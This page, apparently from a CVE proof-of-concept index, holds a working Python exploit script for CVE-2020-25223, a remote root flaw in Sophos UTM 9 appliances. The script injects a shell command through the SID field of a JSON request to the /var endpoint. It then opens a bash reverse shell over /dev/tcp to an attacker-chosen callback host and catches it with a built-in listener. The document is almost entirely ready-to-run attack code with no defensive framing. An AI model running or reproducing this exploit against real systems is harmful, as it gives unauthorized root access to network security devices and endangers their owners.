4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-25223
README.md
Rendering markdown...
POC / sophucked.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python2
# coding: utf-8
# Sophos UTM 9 Remote Root
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time

def handler(lp): # handler borrowed from Stephen Seeley.
    print "(+) starting handler on port %d" %(lp)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print "(+) connection from %s" %(addr[0])
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()
    
def execute_command(target, command):
     url = target + "/var"
     headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
                "Accept": "text/javascript, text/html, application/xml, text/xml, */*",
                "Accept-Language": "en-US,en;q=0.5",
                "Accept-Encoding": "gzip, deflate",
                "X-Requested-With": "XMLHttpRequest",
                "X-Prototype-Version": "1.5.1.1",
                "Content-type": "application/json; charset=UTF-8"}
     data = '{"objs": [{"FID": "init"}], "SID": "|%s|", "browser": "gecko_linux", "backend_version": -1, "loc": "' %(command)
     data += '", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}'
     r = requests.post(url=url, data=data, verify=False, headers=headers)
     
def pop_reverse_shell(target, cb_host, cb_port):
    print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
    backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
    execute_command(target=target, command=backconnect)

def hack_the_planet(target, cb_host, cb_port):
    handlerthr = Thread(target=handler, args=(int(cb_port),))
    handlerthr.start()
    pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)
    
def main(args):
    if len(args) != 4:
        sys.exit("use: %s https://some-utm.lol:4443 hacke.rs 80" %(args[0]))
    hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])

if __name__ == "__main__":
    main(args=sys.argv)